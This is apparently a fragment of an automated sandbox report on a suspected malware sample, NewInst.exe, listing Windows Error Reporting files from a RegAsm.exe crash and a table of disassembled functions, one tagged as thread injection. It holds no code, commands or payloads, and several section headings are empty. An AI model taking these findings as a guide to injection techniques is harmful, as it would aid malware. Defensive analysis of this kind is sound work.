C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_bc4a4c4fb437bcca3219060cc715fc13afa711_8c6fa16e_977c0c66-5e8a-41e9-a4c3-85b89f066d6a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC0.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF87.tmp.dmp

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NewInst.exe.log

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
NewInst.exe

Function 023A2499 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Function 021B0B20 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 391
memoryCOMMON

Function 021B0508 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Function 0042E6A2 Relevance: 28.7, APIs: 9, Strings: 7, Instructions: 690
memoryCOMMON

Function 00433065 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 52
libraryCOMMON

Function 0042E490 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
comCOMMON

Function 0040AD00 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 551
libraryCOMMON

Function 00409E20 Relevance: 4.5, APIs: 3, Instructions: 32
COMMON

Function 0042E5C2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
memoryCOMMON

Function 00431BC0 Relevance: 1.5, APIs: 1, Instructions: 46
memoryCOMMON

Function 00431B50 Relevance: 1.5, APIs: 1, Instructions: 35
memoryCOMMON

Function 00433AE0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 0042E67B Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Function 00431C47 Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON